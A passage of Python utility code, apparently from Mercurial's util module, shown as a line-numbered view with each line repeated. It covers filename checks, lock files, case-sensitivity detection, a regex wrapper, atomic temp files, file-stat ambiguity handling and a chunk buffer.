1678 return _("filename contains '%s', which is reserved "
1679 "on Windows") % base
1679 "on Windows") % base
1680 t = n[-1:]
1680 t = n[-1:]
1681 if t in '. ' and n not in '..':
1681 if t in '. ' and n not in '..':
1682 return _("filename ends with '%s', which is not allowed "
1682 return _("filename ends with '%s', which is not allowed "
1683 "on Windows") % t
1683 "on Windows") % t
1684
1684
1685 if pycompat.iswindows:
1685 if pycompat.iswindows:
1686 checkosfilename = checkwinfilename
1686 checkosfilename = checkwinfilename
1687 timer = time.clock
1687 timer = time.clock
1688 else:
1688 else:
1689 checkosfilename = platform.checkosfilename
1689 checkosfilename = platform.checkosfilename
1690 timer = time.time
1690 timer = time.time
1691
1691
1692 if safehasattr(time, "perf_counter"):
1692 if safehasattr(time, "perf_counter"):
1693 timer = time.perf_counter
1693 timer = time.perf_counter
1694
1694
1695 def makelock(info, pathname):
1695 def makelock(info, pathname):
1696 try:
1696 try:
1697 return os.symlink(info, pathname)
1697 return os.symlink(info, pathname)
1698 except OSError as why:
1698 except OSError as why:
1699 if why.errno == errno.EEXIST:
1699 if why.errno == errno.EEXIST:
1700 raise
1700 raise
1701 except AttributeError: # no symlink in os
1701 except AttributeError: # no symlink in os
1702 pass
1702 pass
1703
1703
1704 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1704 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1705 os.write(ld, info)
1705 os.write(ld, info)
1706 os.close(ld)
1706 os.close(ld)
1707
1707
1708 def readlock(pathname):
1708 def readlock(pathname):
1709 try:
1709 try:
1710 return os.readlink(pathname)
1710 return os.readlink(pathname)
1711 except OSError as why:
1711 except OSError as why:
1712 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1712 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1713 raise
1713 raise
1714 except AttributeError: # no symlink in os
1714 except AttributeError: # no symlink in os
1715 pass
1715 pass
1716 fp = posixfile(pathname)
1716 fp = posixfile(pathname)
1717 r = fp.read()
1717 r = fp.read()
1718 fp.close()
1718 fp.close()
1719 return r
1719 return r
1720
1720
1721 def fstat(fp):
1721 def fstat(fp):
1722 '''stat file object that may not have fileno method.'''
1722 '''stat file object that may not have fileno method.'''
1723 try:
1723 try:
1724 return os.fstat(fp.fileno())
1724 return os.fstat(fp.fileno())
1725 except AttributeError:
1725 except AttributeError:
1726 return os.stat(fp.name)
1726 return os.stat(fp.name)
1727
1727
1728 # File system features
1728 # File system features
1729
1729
1730 def fscasesensitive(path):
1730 def fscasesensitive(path):
1731 """
1731 """
1732 Return true if the given path is on a case-sensitive filesystem
1732 Return true if the given path is on a case-sensitive filesystem
1733
1733
1734 Requires a path (like /foo/.hg) ending with a foldable final
1734 Requires a path (like /foo/.hg) ending with a foldable final
1735 directory component.
1735 directory component.
1736 """
1736 """
1737 s1 = os.lstat(path)
1737 s1 = os.lstat(path)
1738 d, b = os.path.split(path)
1738 d, b = os.path.split(path)
1739 b2 = b.upper()
1739 b2 = b.upper()
1740 if b == b2:
1740 if b == b2:
1741 b2 = b.lower()
1741 b2 = b.lower()
1742 if b == b2:
1742 if b == b2:
1743 return True # no evidence against case sensitivity
1743 return True # no evidence against case sensitivity
1744 p2 = os.path.join(d, b2)
1744 p2 = os.path.join(d, b2)
1745 try:
1745 try:
1746 s2 = os.lstat(p2)
1746 s2 = os.lstat(p2)
1747 if s2 == s1:
1747 if s2 == s1:
1748 return False
1748 return False
1749 return True
1749 return True
1750 except OSError:
1750 except OSError:
1751 return True
1751 return True
1752
1752
1753 try:
1753 try:
1754 import re2
1754 import re2
1755 _re2 = None
1755 _re2 = None
1756 except ImportError:
1756 except ImportError:
1757 _re2 = False
1757 _re2 = False
1758
1758
1759 class _re(object):
1759 class _re(object):
1760 def _checkre2(self):
1760 def _checkre2(self):
1761 global _re2
1761 global _re2
1762 try:
1762 try:
1763 # check if match works, see issue3964
1763 # check if match works, see issue3964
1764 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1764 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1765 except ImportError:
1765 except ImportError:
1766 _re2 = False
1766 _re2 = False
1767
1767
1768 def compile(self, pat, flags=0):
1768 def compile(self, pat, flags=0):
1769 '''Compile a regular expression, using re2 if possible
1769 '''Compile a regular expression, using re2 if possible
1770
1770
1771 For best performance, use only re2-compatible regexp features. The
1771 For best performance, use only re2-compatible regexp features. The
1772 only flags from the re module that are re2-compatible are
1772 only flags from the re module that are re2-compatible are
1773 IGNORECASE and MULTILINE.'''
1773 IGNORECASE and MULTILINE.'''
1774 if _re2 is None:
1774 if _re2 is None:
1775 self._checkre2()
1775 self._checkre2()
1776 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1776 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1777 if flags & remod.IGNORECASE:
1777 if flags & remod.IGNORECASE:
1778 pat = '(?i)' + pat
1778 pat = '(?i)' + pat
1779 if flags & remod.MULTILINE:
1779 if flags & remod.MULTILINE:
1780 pat = '(?m)' + pat
1780 pat = '(?m)' + pat
1781 try:
1781 try:
1782 return re2.compile(pat)
1782 return re2.compile(pat)
1783 except re2.error:
1783 except re2.error:
1784 pass
1784 pass
1785 return remod.compile(pat, flags)
1785 return remod.compile(pat, flags)
1786
1786
1787 @propertycache
1787 @propertycache
1788 def escape(self):
1788 def escape(self):
1789 '''Return the version of escape corresponding to self.compile.
1789 '''Return the version of escape corresponding to self.compile.
1790
1790
1791 This is imperfect because whether re2 or re is used for a particular
1791 This is imperfect because whether re2 or re is used for a particular
1792 function depends on the flags, etc, but it's the best we can do.
1792 function depends on the flags, etc, but it's the best we can do.
1793 '''
1793 '''
1794 global _re2
1794 global _re2
1795 if _re2 is None:
1795 if _re2 is None:
1796 self._checkre2()
1796 self._checkre2()
1797 if _re2:
1797 if _re2:
1798 return re2.escape
1798 return re2.escape
1799 else:
1799 else:
1800 return remod.escape
1800 return remod.escape
1801
1801
1802 re = _re()
1802 re = _re()
1803
1803
1804 _fspathcache = {}
1804 _fspathcache = {}
1805 def fspath(name, root):
1805 def fspath(name, root):
1806 '''Get name in the case stored in the filesystem
1806 '''Get name in the case stored in the filesystem
1807
1807
1808 The name should be relative to root, and be normcase-ed for efficiency.
1808 The name should be relative to root, and be normcase-ed for efficiency.
1809
1809
1810 Note that this function is unnecessary, and should not be
1810 Note that this function is unnecessary, and should not be
1811 called, for case-sensitive filesystems (simply because it's expensive).
1811 called, for case-sensitive filesystems (simply because it's expensive).
1812
1812
1813 The root should be normcase-ed, too.
1813 The root should be normcase-ed, too.
1814 '''
1814 '''
1815 def _makefspathcacheentry(dir):
1815 def _makefspathcacheentry(dir):
1816 return dict((normcase(n), n) for n in os.listdir(dir))
1816 return dict((normcase(n), n) for n in os.listdir(dir))
1817
1817
1818 seps = pycompat.ossep
1818 seps = pycompat.ossep
1819 if pycompat.osaltsep:
1819 if pycompat.osaltsep:
1820 seps = seps + pycompat.osaltsep
1820 seps = seps + pycompat.osaltsep
1821 # Protect backslashes. This gets silly very quickly.
1821 # Protect backslashes. This gets silly very quickly.
1822 seps.replace('\\','\\\\')
1822 seps.replace('\\','\\\\')
1823 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1823 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1824 dir = os.path.normpath(root)
1824 dir = os.path.normpath(root)
1825 result = []
1825 result = []
1826 for part, sep in pattern.findall(name):
1826 for part, sep in pattern.findall(name):
1827 if sep:
1827 if sep:
1828 result.append(sep)
1828 result.append(sep)
1829 continue
1829 continue
1830
1830
1831 if dir not in _fspathcache:
1831 if dir not in _fspathcache:
1832 _fspathcache[dir] = _makefspathcacheentry(dir)
1832 _fspathcache[dir] = _makefspathcacheentry(dir)
1833 contents = _fspathcache[dir]
1833 contents = _fspathcache[dir]
1834
1834
1835 found = contents.get(part)
1835 found = contents.get(part)
1836 if not found:
1836 if not found:
1837 # retry "once per directory" per "dirstate.walk" which
1837 # retry "once per directory" per "dirstate.walk" which
1838 # may take place for each patches of "hg qpush", for example
1838 # may take place for each patches of "hg qpush", for example
1839 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1839 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1840 found = contents.get(part)
1840 found = contents.get(part)
1841
1841
1842 result.append(found or part)
1842 result.append(found or part)
1843 dir = os.path.join(dir, part)
1843 dir = os.path.join(dir, part)
1844
1844
1845 return ''.join(result)
1845 return ''.join(result)
1846
1846
1847 def checknlink(testfile):
1847 def checknlink(testfile):
1848 '''check whether hardlink count reporting works properly'''
1848 '''check whether hardlink count reporting works properly'''
1849
1849
1850 # testfile may be open, so we need a separate file for checking to
1850 # testfile may be open, so we need a separate file for checking to
1851 # work around issue2543 (or testfile may get lost on Samba shares)
1851 # work around issue2543 (or testfile may get lost on Samba shares)
1852 f1, f2, fp = None, None, None
1852 f1, f2, fp = None, None, None
1853 try:
1853 try:
1854 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1854 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1855 suffix='1~', dir=os.path.dirname(testfile))
1855 suffix='1~', dir=os.path.dirname(testfile))
1856 os.close(fd)
1856 os.close(fd)
1857 f2 = '%s2~' % f1[:-2]
1857 f2 = '%s2~' % f1[:-2]
1858
1858
1859 oslink(f1, f2)
1859 oslink(f1, f2)
1860 # nlinks() may behave differently for files on Windows shares if
1860 # nlinks() may behave differently for files on Windows shares if
1861 # the file is open.
1861 # the file is open.
1862 fp = posixfile(f2)
1862 fp = posixfile(f2)
1863 return nlinks(f2) > 1
1863 return nlinks(f2) > 1
1864 except OSError:
1864 except OSError:
1865 return False
1865 return False
1866 finally:
1866 finally:
1867 if fp is not None:
1867 if fp is not None:
1868 fp.close()
1868 fp.close()
1869 for f in (f1, f2):
1869 for f in (f1, f2):
1870 try:
1870 try:
1871 if f is not None:
1871 if f is not None:
1872 os.unlink(f)
1872 os.unlink(f)
1873 except OSError:
1873 except OSError:
1874 pass
1874 pass
1875
1875
1876 def endswithsep(path):
1876 def endswithsep(path):
1877 '''Check path ends with os.sep or os.altsep.'''
1877 '''Check path ends with os.sep or os.altsep.'''
1878 return (path.endswith(pycompat.ossep)
1878 return (path.endswith(pycompat.ossep)
1879 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1879 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1880
1880
1881 def splitpath(path):
1881 def splitpath(path):
1882 '''Split path by os.sep.
1882 '''Split path by os.sep.
1883 Note that this function does not use os.altsep because this is
1883 Note that this function does not use os.altsep because this is
1884 an alternative of simple "xxx.split(os.sep)".
1884 an alternative of simple "xxx.split(os.sep)".
1885 It is recommended to use os.path.normpath() before using this
1885 It is recommended to use os.path.normpath() before using this
1886 function if need.'''
1886 function if need.'''
1887 return path.split(pycompat.ossep)
1887 return path.split(pycompat.ossep)
1888
1888
1889 def gui():
1889 def gui():
1890 '''Are we running in a GUI?'''
1890 '''Are we running in a GUI?'''
1891 if pycompat.isdarwin:
1891 if pycompat.isdarwin:
1892 if 'SSH_CONNECTION' in encoding.environ:
1892 if 'SSH_CONNECTION' in encoding.environ:
1893 # handle SSH access to a box where the user is logged in
1893 # handle SSH access to a box where the user is logged in
1894 return False
1894 return False
1895 elif getattr(osutil, 'isgui', None):
1895 elif getattr(osutil, 'isgui', None):
1896 # check if a CoreGraphics session is available
1896 # check if a CoreGraphics session is available
1897 return osutil.isgui()
1897 return osutil.isgui()
1898 else:
1898 else:
1899 # pure build; use a safe default
1899 # pure build; use a safe default
1900 return True
1900 return True
1901 else:
1901 else:
1902 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1902 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1903
1903
1904 def mktempcopy(name, emptyok=False, createmode=None):
1904 def mktempcopy(name, emptyok=False, createmode=None):
1905 """Create a temporary file with the same contents from name
1905 """Create a temporary file with the same contents from name
1906
1906
1907 The permission bits are copied from the original file.
1907 The permission bits are copied from the original file.
1908
1908
1909 If the temporary file is going to be truncated immediately, you
1909 If the temporary file is going to be truncated immediately, you
1910 can use emptyok=True as an optimization.
1910 can use emptyok=True as an optimization.
1911
1911
1912 Returns the name of the temporary file.
1912 Returns the name of the temporary file.
1913 """
1913 """
1914 d, fn = os.path.split(name)
1914 d, fn = os.path.split(name)
1915 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1915 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1916 os.close(fd)
1916 os.close(fd)
1917 # Temporary files are created with mode 0600, which is usually not
1917 # Temporary files are created with mode 0600, which is usually not
1918 # what we want. If the original file already exists, just copy
1918 # what we want. If the original file already exists, just copy
1919 # its mode. Otherwise, manually obey umask.
1919 # its mode. Otherwise, manually obey umask.
1920 copymode(name, temp, createmode)
1920 copymode(name, temp, createmode)
1921 if emptyok:
1921 if emptyok:
1922 return temp
1922 return temp
1923 try:
1923 try:
1924 try:
1924 try:
1925 ifp = posixfile(name, "rb")
1925 ifp = posixfile(name, "rb")
1926 except IOError as inst:
1926 except IOError as inst:
1927 if inst.errno == errno.ENOENT:
1927 if inst.errno == errno.ENOENT:
1928 return temp
1928 return temp
1929 if not getattr(inst, 'filename', None):
1929 if not getattr(inst, 'filename', None):
1930 inst.filename = name
1930 inst.filename = name
1931 raise
1931 raise
1932 ofp = posixfile(temp, "wb")
1932 ofp = posixfile(temp, "wb")
1933 for chunk in filechunkiter(ifp):
1933 for chunk in filechunkiter(ifp):
1934 ofp.write(chunk)
1934 ofp.write(chunk)
1935 ifp.close()
1935 ifp.close()
1936 ofp.close()
1936 ofp.close()
1937 except: # re-raises
1937 except: # re-raises
1938 try:
1938 try:
1939 os.unlink(temp)
1939 os.unlink(temp)
1940 except OSError:
1940 except OSError:
1941 pass
1941 pass
1942 raise
1942 raise
1943 return temp
1943 return temp
1944
1944
1945 class filestat(object):
1945 class filestat(object):
1946 """help to exactly detect change of a file
1946 """help to exactly detect change of a file
1947
1947
1948 'stat' attribute is result of 'os.stat()' if specified 'path'
1948 'stat' attribute is result of 'os.stat()' if specified 'path'
1949 exists. Otherwise, it is None. This can avoid preparative
1949 exists. Otherwise, it is None. This can avoid preparative
1950 'exists()' examination on client side of this class.
1950 'exists()' examination on client side of this class.
1951 """
1951 """
1952 def __init__(self, stat):
1952 def __init__(self, stat):
1953 self.stat = stat
1953 self.stat = stat
1954
1954
1955 @classmethod
1955 @classmethod
1956 def frompath(cls, path):
1956 def frompath(cls, path):
1957 try:
1957 try:
1958 stat = os.stat(path)
1958 stat = os.stat(path)
1959 except OSError as err:
1959 except OSError as err:
1960 if err.errno != errno.ENOENT:
1960 if err.errno != errno.ENOENT:
1961 raise
1961 raise
1962 stat = None
1962 stat = None
1963 return cls(stat)
1963 return cls(stat)
1964
1964
1965 @classmethod
1965 @classmethod
1966 def fromfp(cls, fp):
1966 def fromfp(cls, fp):
1967 stat = os.fstat(fp.fileno())
1967 stat = os.fstat(fp.fileno())
1968 return cls(stat)
1968 return cls(stat)
1969
1969
1970 __hash__ = object.__hash__
1970 __hash__ = object.__hash__
1971
1971
1972 def __eq__(self, old):
1972 def __eq__(self, old):
1973 try:
1973 try:
1974 # if ambiguity between stat of new and old file is
1974 # if ambiguity between stat of new and old file is
1975 # avoided, comparison of size, ctime and mtime is enough
1975 # avoided, comparison of size, ctime and mtime is enough
1976 # to exactly detect change of a file regardless of platform
1976 # to exactly detect change of a file regardless of platform
1977 return (self.stat.st_size == old.stat.st_size and
1977 return (self.stat.st_size == old.stat.st_size and
1978 self.stat.st_ctime == old.stat.st_ctime and
1978 self.stat.st_ctime == old.stat.st_ctime and
1979 self.stat.st_mtime == old.stat.st_mtime)
1979 self.stat.st_mtime == old.stat.st_mtime)
1980 except AttributeError:
1980 except AttributeError:
1981 pass
1981 pass
1982 try:
1982 try:
1983 return self.stat is None and old.stat is None
1983 return self.stat is None and old.stat is None
1984 except AttributeError:
1984 except AttributeError:
1985 return False
1985 return False
1986
1986
1987 def isambig(self, old):
1987 def isambig(self, old):
1988 """Examine whether new (= self) stat is ambiguous against old one
1988 """Examine whether new (= self) stat is ambiguous against old one
1989
1989
1990 "S[N]" below means stat of a file at N-th change:
1990 "S[N]" below means stat of a file at N-th change:
1991
1991
1992 - S[n-1].ctime < S[n].ctime: can detect change of a file
1992 - S[n-1].ctime < S[n].ctime: can detect change of a file
1993 - S[n-1].ctime == S[n].ctime
1993 - S[n-1].ctime == S[n].ctime
1994 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1994 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1995 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1995 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1996 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1996 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1997 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1997 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1998
1998
1999 Case (*2) above means that a file was changed twice or more at
1999 Case (*2) above means that a file was changed twice or more at
2000 same time in sec (= S[n-1].ctime), and comparison of timestamp
2000 same time in sec (= S[n-1].ctime), and comparison of timestamp
2001 is ambiguous.
2001 is ambiguous.
2002
2002
2003 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2003 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2004 timestamp is ambiguous".
2004 timestamp is ambiguous".
2005
2005
2006 But advancing mtime only in case (*2) doesn't work as
2006 But advancing mtime only in case (*2) doesn't work as
2007 expected, because naturally advanced S[n].mtime in case (*1)
2007 expected, because naturally advanced S[n].mtime in case (*1)
2008 might be equal to manually advanced S[n-1 or earlier].mtime.
2008 might be equal to manually advanced S[n-1 or earlier].mtime.
2009
2009
2010 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2010 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2011 treated as ambiguous regardless of mtime, to avoid overlooking
2011 treated as ambiguous regardless of mtime, to avoid overlooking
2012 by confliction between such mtime.
2012 by confliction between such mtime.
2013
2013
2014 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2014 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2015 S[n].mtime", even if size of a file isn't changed.
2015 S[n].mtime", even if size of a file isn't changed.
2016 """
2016 """
2017 try:
2017 try:
2018 return (self.stat.st_ctime == old.stat.st_ctime)
2018 return (self.stat.st_ctime == old.stat.st_ctime)
2019 except AttributeError:
2019 except AttributeError:
2020 return False
2020 return False
2021
2021
2022 def avoidambig(self, path, old):
2022 def avoidambig(self, path, old):
2023 """Change file stat of specified path to avoid ambiguity
2023 """Change file stat of specified path to avoid ambiguity
2024
2024
2025 'old' should be previous filestat of 'path'.
2025 'old' should be previous filestat of 'path'.
2026
2026
2027 This skips avoiding ambiguity, if a process doesn't have
2027 This skips avoiding ambiguity, if a process doesn't have
2028 appropriate privileges for 'path'. This returns False in this
2028 appropriate privileges for 'path'. This returns False in this
2029 case.
2029 case.
2030
2030
2031 Otherwise, this returns True, as "ambiguity is avoided".
2031 Otherwise, this returns True, as "ambiguity is avoided".
2032 """
2032 """
2033 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2033 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2034 try:
2034 try:
2035 os.utime(path, (advanced, advanced))
2035 os.utime(path, (advanced, advanced))
2036 except OSError as inst:
2036 except OSError as inst:
2037 if inst.errno == errno.EPERM:
2037 if inst.errno == errno.EPERM:
2038 # utime() on the file created by another user causes EPERM,
2038 # utime() on the file created by another user causes EPERM,
2039 # if a process doesn't have appropriate privileges
2039 # if a process doesn't have appropriate privileges
2040 return False
2040 return False
2041 raise
2041 raise
2042 return True
2042 return True
2043
2043
2044 def __ne__(self, other):
2044 def __ne__(self, other):
2045 return not self == other
2045 return not self == other
2046
2046
2047 class atomictempfile(object):
2047 class atomictempfile(object):
2048 '''writable file object that atomically updates a file
2048 '''writable file object that atomically updates a file
2049
2049
2050 All writes will go to a temporary copy of the original file. Call
2050 All writes will go to a temporary copy of the original file. Call
2051 close() when you are done writing, and atomictempfile will rename
2051 close() when you are done writing, and atomictempfile will rename
2052 the temporary copy to the original name, making the changes
2052 the temporary copy to the original name, making the changes
2053 visible. If the object is destroyed without being closed, all your
2053 visible. If the object is destroyed without being closed, all your
2054 writes are discarded.
2054 writes are discarded.
2055
2055
2056 checkambig argument of constructor is used with filestat, and is
2056 checkambig argument of constructor is used with filestat, and is
2057 useful only if target file is guarded by any lock (e.g. repo.lock
2057 useful only if target file is guarded by any lock (e.g. repo.lock
2058 or repo.wlock).
2058 or repo.wlock).
2059 '''
2059 '''
2060 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2060 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2061 self.__name = name # permanent name
2061 self.__name = name # permanent name
2062 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2062 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2063 createmode=createmode)
2063 createmode=createmode)
2064 self._fp = posixfile(self._tempname, mode)
2064 self._fp = posixfile(self._tempname, mode)
2065 self._checkambig = checkambig
2065 self._checkambig = checkambig
2066
2066
2067 # delegated methods
2067 # delegated methods
2068 self.read = self._fp.read
2068 self.read = self._fp.read
2069 self.write = self._fp.write
2069 self.write = self._fp.write
2070 self.seek = self._fp.seek
2070 self.seek = self._fp.seek
2071 self.tell = self._fp.tell
2071 self.tell = self._fp.tell
2072 self.fileno = self._fp.fileno
2072 self.fileno = self._fp.fileno
2073
2073
2074 def close(self):
2074 def close(self):
2075 if not self._fp.closed:
2075 if not self._fp.closed:
2076 self._fp.close()
2076 self._fp.close()
2077 filename = localpath(self.__name)
2077 filename = localpath(self.__name)
2078 oldstat = self._checkambig and filestat.frompath(filename)
2078 oldstat = self._checkambig and filestat.frompath(filename)
2079 if oldstat and oldstat.stat:
2079 if oldstat and oldstat.stat:
2080 rename(self._tempname, filename)
2080 rename(self._tempname, filename)
2081 newstat = filestat.frompath(filename)
2081 newstat = filestat.frompath(filename)
2082 if newstat.isambig(oldstat):
2082 if newstat.isambig(oldstat):
2083 # stat of changed file is ambiguous to original one
2083 # stat of changed file is ambiguous to original one
2084 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2084 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2085 os.utime(filename, (advanced, advanced))
2085 os.utime(filename, (advanced, advanced))
2086 else:
2086 else:
2087 rename(self._tempname, filename)
2087 rename(self._tempname, filename)
2088
2088
2089 def discard(self):
2089 def discard(self):
2090 if not self._fp.closed:
2090 if not self._fp.closed:
2091 try:
2091 try:
2092 os.unlink(self._tempname)
2092 os.unlink(self._tempname)
2093 except OSError:
2093 except OSError:
2094 pass
2094 pass
2095 self._fp.close()
2095 self._fp.close()
2096
2096
2097 def __del__(self):
2097 def __del__(self):
2098 if safehasattr(self, '_fp'): # constructor actually did something
2098 if safehasattr(self, '_fp'): # constructor actually did something
2099 self.discard()
2099 self.discard()
2100
2100
2101 def __enter__(self):
2101 def __enter__(self):
2102 return self
2102 return self
2103
2103
2104 def __exit__(self, exctype, excvalue, traceback):
2104 def __exit__(self, exctype, excvalue, traceback):
2105 if exctype is not None:
2105 if exctype is not None:
2106 self.discard()
2106 self.discard()
2107 else:
2107 else:
2108 self.close()
2108 self.close()
2109
2109
2110 def unlinkpath(f, ignoremissing=False):
2110 def unlinkpath(f, ignoremissing=False):
2111 """unlink and remove the directory if it is empty"""
2111 """unlink and remove the directory if it is empty"""
2112 if ignoremissing:
2112 if ignoremissing:
2113 tryunlink(f)
2113 tryunlink(f)
2114 else:
2114 else:
2115 unlink(f)
2115 unlink(f)
2116 # try removing directories that might now be empty
2116 # try removing directories that might now be empty
2117 try:
2117 try:
2118 removedirs(os.path.dirname(f))
2118 removedirs(os.path.dirname(f))
2119 except OSError:
2119 except OSError:
2120 pass
2120 pass
2121
2121
2122 def tryunlink(f):
2122 def tryunlink(f):
2123 """Attempt to remove a file, ignoring ENOENT errors."""
2123 """Attempt to remove a file, ignoring ENOENT errors."""
2124 try:
2124 try:
2125 unlink(f)
2125 unlink(f)
2126 except OSError as e:
2126 except OSError as e:
2127 if e.errno != errno.ENOENT:
2127 if e.errno != errno.ENOENT:
2128 raise
2128 raise
2129
2129
2130 def makedirs(name, mode=None, notindexed=False):
2130 def makedirs(name, mode=None, notindexed=False):
2131 """recursive directory creation with parent mode inheritance
2131 """recursive directory creation with parent mode inheritance
2132
2132
2133 Newly created directories are marked as "not to be indexed by
2133 Newly created directories are marked as "not to be indexed by
2134 the content indexing service", if ``notindexed`` is specified
2134 the content indexing service", if ``notindexed`` is specified
2135 for "write" mode access.
2135 for "write" mode access.
2136 """
2136 """
2137 try:
2137 try:
2138 makedir(name, notindexed)
2138 makedir(name, notindexed)
2139 except OSError as err:
2139 except OSError as err:
2140 if err.errno == errno.EEXIST:
2140 if err.errno == errno.EEXIST:
2141 return
2141 return
2142 if err.errno != errno.ENOENT or not name:
2142 if err.errno != errno.ENOENT or not name:
2143 raise
2143 raise
2144 parent = os.path.dirname(os.path.abspath(name))
2144 parent = os.path.dirname(os.path.abspath(name))
2145 if parent == name:
2145 if parent == name:
2146 raise
2146 raise
2147 makedirs(parent, mode, notindexed)
2147 makedirs(parent, mode, notindexed)
2148 try:
2148 try:
2149 makedir(name, notindexed)
2149 makedir(name, notindexed)
2150 except OSError as err:
2150 except OSError as err:
2151 # Catch EEXIST to handle races
2151 # Catch EEXIST to handle races
2152 if err.errno == errno.EEXIST:
2152 if err.errno == errno.EEXIST:
2153 return
2153 return
2154 raise
2154 raise
2155 if mode is not None:
2155 if mode is not None:
2156 os.chmod(name, mode)
2156 os.chmod(name, mode)
2157
2157
2158 def readfile(path):
2158 def readfile(path):
2159 with open(path, 'rb') as fp:
2159 with open(path, 'rb') as fp:
2160 return fp.read()
2160 return fp.read()
2161
2161
2162 def writefile(path, text):
2162 def writefile(path, text):
2163 with open(path, 'wb') as fp:
2163 with open(path, 'wb') as fp:
2164 fp.write(text)
2164 fp.write(text)
2165
2165
2166 def appendfile(path, text):
2166 def appendfile(path, text):
2167 with open(path, 'ab') as fp:
2167 with open(path, 'ab') as fp:
2168 fp.write(text)
2168 fp.write(text)
2169
2169
2170 class chunkbuffer(object):
2170 class chunkbuffer(object):
2171 """Allow arbitrary sized chunks of data to be efficiently read from an
2171 """Allow arbitrary sized chunks of data to be efficiently read from an
2172 iterator over chunks of arbitrary size."""
2172 iterator over chunks of arbitrary size."""
2173
2173
2174 def __init__(self, in_iter):
2174 def __init__(self, in_iter):
2175 """in_iter is the iterator that's iterating over the input chunks."""
2175 """in_iter is the iterator that's iterating over the input chunks."""
2176 def splitbig(chunks):
2176 def splitbig(chunks):
2177 for chunk in chunks:
2177 for chunk in chunks:
2178 if len(chunk) > 2**20:
2178 if len(chunk) > 2**20:
2179 pos = 0
2179 pos = 0
2180 while pos < len(chunk):
2180 while pos < len(chunk):
2181 end = pos + 2 ** 18
2181 end = pos + 2 ** 18
2182 yield chunk[pos:end]
2182 yield chunk[pos:end]
2183 pos = end
2183 pos = end
2184 else:
2184 else:
2185 yield chunk
2185 yield chunk
2186 self.iter = splitbig(in_iter)
2186 self.iter = splitbig(in_iter)
2187 self._queue = collections.deque()
2187 self._queue = collections.deque()
2188 self._chunkoffset = 0
2188 self._chunkoffset = 0
2189
2189
2190 def read(self, l=None):
2190 def read(self, l=None):
2191 """Read L bytes of data from the iterator of chunks of data.
2191 """Read L bytes of data from the iterator of chunks of data.
2192 Returns less than L bytes if the iterator runs dry.
2192 Returns less than L bytes if the iterator runs dry.
2193
2193
2194 If size parameter is omitted, read everything"""
2194 If size parameter is omitted, read everything"""
2195 if l is None:
2195 if l is None:
2196 return ''.join(self.iter)
2196 return ''.join(self.iter)
2197
2197
2198 left = l
2198 left = l
2199 buf = []
2199 buf = []
2200 queue = self._queue
2200 queue = self._queue
2201 while left > 0:
2201 while left > 0:
2202 # refill the queue
2202 # refill the queue
2203 if not queue:
2203 if not queue:
2204 target = 2**18
2204 target = 2**18
2205 for chunk in self.iter:
2205 for chunk in self.iter:
2206 queue.append(chunk)
2206 queue.append(chunk)
2207 target -= len(chunk)
2207 target -= len(chunk)
2208 if target <= 0:
2208 if target <= 0:
2209 break
2209 break
2210 if not queue:
2210 if not queue:
2211 break
2211 break
2212
2212
2213 # The easy way to do this would be to queue.popleft(), modify the
2213 # The easy way to do this would be to queue.popleft(), modify the
2214 # chunk (if necessary), then queue.appendleft(). However, for cases
2214 # chunk (if necessary), then queue.appendleft(). However, for cases
2215 # where we read partial chunk content, this incurs 2 dequeue
2215 # where we read partial chunk content, this incurs 2 dequeue
2216 # mutations and creates a new str for the remaining chunk in the
2216 # mutations and creates a new str for the remaining chunk in the
2217 # queue. Our code below avoids this overhead.
2217 # queue. Our code below avoids this overhead.
2218
2218
2219 chunk = queue[0]
2219 chunk = queue[0]
2220 chunkl = len(chunk)
2220 chunkl = len(chunk)
2221 offset = self._chunkoffset
2221 offset = self._chunkoffset
2222
2222
2223 # Use full chunk.
2223 # Use full chunk.
2224 if offset == 0 and left >= chunkl:
2224 if offset == 0 and left >= chunkl:
2225 left -= chunkl
2225 left -= chunkl
2226 queue.popleft()
2226 queue.popleft()
2227 buf.append(chunk)
2227 buf.append(chunk)
2228 # self._chunkoffset remains at 0.
2228 # self._chunkoffset remains at 0.
2229 continue
2229 continue
2230
2230
